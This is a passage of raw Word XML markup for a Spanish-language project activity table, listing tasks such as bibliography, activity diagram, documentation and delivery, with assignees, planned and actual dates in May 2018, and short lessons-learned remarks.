            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Basarnos en los problemas presentados durante el desarrollo de esta actividad para no cometerlos en las siguientes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7AEC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="0025575A" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025575A">
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRDefault="00471260" w:rsidP="00471260">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Bibliografía</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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TODOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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12/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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12/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00C452D1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Se buscó tener en este apartado bibliografías de fuentes confiables, más que un riesgo o así </w:t>
            </w:r>
            <w:r w:rsidRPr="00C452D1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>simplemente es seguir buscando en fuentes confiable para dar información certera en cada uno de los documentos que se desarrollan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7A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Borders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Diagrama de Actividades</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MRG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00C452D1">
              <w:t>Puede existir un desfase de tiempo en cada una de las tareas que se desarrollan durante la actividad puesto que su realización a pie de la letra es difícil.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7AEC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Documentación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MRG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00B90638" w:rsidP="00471260">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19</w:t>
            </w:r>
            <w:r w:rsidR="00471260">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="00471260" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>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18/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Mejorar el formato para el documento esto con darle una mejor vista al lector.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D00508" w:rsidRPr="00977D14" w:rsidTr="003A7A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Borders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="0025575A" w:rsidP="00977D14">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Entrega de actividad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">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r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MRG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="002C760A" w:rsidP="00977D14">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>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19/05</w:t>
            </w:r>
            <w:r w:rsidR="00977D14" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
